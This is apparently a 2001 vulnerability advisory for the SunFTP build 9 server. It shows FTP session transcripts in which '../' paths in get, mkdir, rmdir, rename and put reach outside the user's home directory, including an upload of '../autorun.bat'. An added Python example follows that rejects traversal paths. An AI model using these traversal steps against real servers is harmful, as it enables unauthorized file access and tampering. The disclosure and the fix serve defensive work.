Sunftp build9(1) - ftp server Vulnerability

2001-03-03T00:00:00
ID SECURITYVULNS:DOC:1343
Type securityvulns
Reporter Securityvulns
Modified 2001-03-03T00:00:00

Description

It is possible to break out of the root directory by using relative paths.

e:\crap was used as the home directory of user test.

the get command

getting files from outside of the root dir.

    220 chris FTP Server (SunFTP b9) ready on port 21...
    Benutzer (10.17.3.44:(none)): test
    331 Password required for test.
    Kennwort:
    230 User test logged in.
    ftp> dir
    200 Port command successful.
    150 Opening data connection for directory list.
    drw-rw-rw- 1 ftp ftp 0 Feb 28 13:46 .
    drw-rw-rw- 1 ftp ftp 0 Feb 28 13:46 ..
    -rw-rw-rw- 1 ftp ftp 0 Mar 02 11:21 test.txt
    226 File sent ok
    FTP: 179 Bytes empfangen in 0,00Sekunden 179000,00KB/s
    ftp> cd ..
    501 CWD failed. No permission
    ftp> get ../sunftptest.txt
    200 Port command successful.
    150 Opening data connection for ../sunftptest.txt.
    226 File sent ok
    FTP: 1443 Bytes empfangen in 0,00Sekunden 1443000,00KB/s

the mkdir command

without priv. to create directories:

    ftp> mkdir test
    550 '/test': can't create directory.
    ftp> mkdir ../test
    257 '/../test': directory created.

Hell! It's getting worse...

the rmdir command

without any priv. to remove anything

    ftp> rmdir ../test
    250 '/../test': directory removed.

This only works with empty directories.

the rename command

It is possible to rename files outside of the root directory without permissions. It is also possible to move files with the rename command when the filename is known.

    ftp> dir
    200 Port command successful.
    150 Opening data connection for directory list.
    drw-rw-rw- 1 ftp ftp 0 Feb 28 13:46 .
    drw-rw-rw- 1 ftp ftp 0 Feb 28 13:46 ..
    -rw-rw-rw- 1 ftp ftp 0 Mar 02 11:21 grmbl.txt
    drw-rw-rw- 1 ftp ftp 0 Mar 02 12:17 test
    226 File sent ok
    FTP: 240 Bytes empfangen in 0,00Sekunden 240000,00KB/s
    ftp> cd ..
    501 CWD failed. No permission
    ftp> rename ../sunftptest.txt movedtohomedir.txt
    350 File exists, ready for destination name.
    250 File '/../sunftptest.txt' renamed to '/movedtohomedir.txt'.
    ftp> dir
    200 Port command successful.
    150 Opening data connection for directory list.
    drw-rw-rw- 1 ftp ftp 0 Feb 28 13:46 .
    drw-rw-rw- 1 ftp ftp 0 Feb 28 13:46 ..
    -rw-rw-rw- 1 ftp ftp 0 Mar 02 11:21 grmbl.txt
    drw-rw-rw- 1 ftp ftp 0 Mar 02 12:17 test
    -rw-rw-rw- 1 ftp ftp 6 Mar 02 12:33 movedtohomedir.txt
    226 File sent ok
    FTP: 314 Bytes empfangen in 0,00Sekunden 314000,00KB/s

the put command

If you have permission to upload files, you can put these files outside of the home directory.

    ftp> dir
    200 Port command successful.
    150 Opening data connection for directory list.
    drw-rw-rw- 1 ftp ftp 0 Feb 28 13:46 .
    drw-rw-rw- 1 ftp ftp 0 Feb 28 13:46 ..
    -rw-rw-rw- 1 ftp ftp 0 Mar 02 11:21 grmbl.txt
    drw-rw-rw- 1 ftp ftp 0 Mar 02 12:17 test
    -rw-rw-rw- 1 ftp ftp 6 Mar 02 12:33 movedtohomedir.txt
    226 File sent ok
    FTP: 314 Bytes empfangen in 0,00Sekunden 314000,00KB/s
    ftp> put
    Lokale Datei c:\test.txt
    Remotedatei test.txt
    200 Port command successful.
    150 Opening data connection for test.txt.
    226 File received ok
    ftp> put
    Lokale Datei c:\test.txt
    Remotedatei ../autorun.bat
    200 Port command successful.
    150 Opening data connection for ../autorun.bat.
    226 File received ok

Solution

No quick bugfix. Use with care.

I tried to contact the authors, but their webpage seems to be down.

se00020@lion.cc or se00020@fhs-hagenberg.ac.at
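
The transcripts show the home-directory check being applied to cd but not to get, mkdir, rmdir, rename or put. The following is an added example, not SunFTP's code and not part of the original advisory: one shared path check that every path-taking command handler calls before touching the file system. The names resolve, handle and PathRejected are hypothetical, and the mapping of the client commands to the FTP verbs RETR, MKD, RMD, RNFR and STOR is assumed.

```python
import ntpath
import re

HOME = r"e:\crap"  # home directory of user "test", as in the advisory


class PathRejected(Exception):
    """Raised when a client-supplied path would leave the home directory."""


def resolve(home, cwd, arg):
    """Map an FTP path argument to a local path inside `home`, or raise.

    `cwd` is the session's virtual working directory ("/" is the home dir).
    """
    if "\x00" in arg or ":" in arg:
        # NUL bytes, drive letters and NTFS stream names are never valid here.
        raise PathRejected("illegal character in %r" % arg)
    # Absolute arguments start at the virtual root, others at the session cwd.
    start = "" if arg[:1] in ("/", "\\") else cwd
    parts = []
    # A Windows server has to treat "/" and "\" as the same separator.
    for seg in re.split(r"[\\/]+", start + "/" + arg):
        if seg in ("", "."):
            continue
        if seg == "..":
            if not parts:
                raise PathRejected("%r climbs above the home directory" % arg)
            parts.pop()
        elif seg.strip(". ") == "":
            # Conservative: refuse segments made only of dots and spaces.
            raise PathRejected("ambiguous segment in %r" % arg)
        else:
            parts.append(seg)
    return ntpath.join(home, *parts)


def handle(verb, arg, cwd="/"):
    """Reply a command handler would send after running the shared check."""
    try:
        local = resolve(HOME, cwd, arg)
    except PathRejected:
        return "550 %s: permission denied." % arg
    return "OK %s -> %s" % (verb, local)


# Path arguments taken from the advisory's transcripts.
REQUESTS = [("RETR", "../sunftptest.txt"), ("MKD", "../test"), ("RMD", "../test"),
            ("RNFR", "../sunftptest.txt"), ("STOR", "../autorun.bat"),
            ("STOR", "test.txt")]
REPLIES = [handle(verb, arg) for verb, arg in REQUESTS]
```

The check is lexical only; a server whose home directories can contain links or junctions would also need to compare the resolved real path against the home directory.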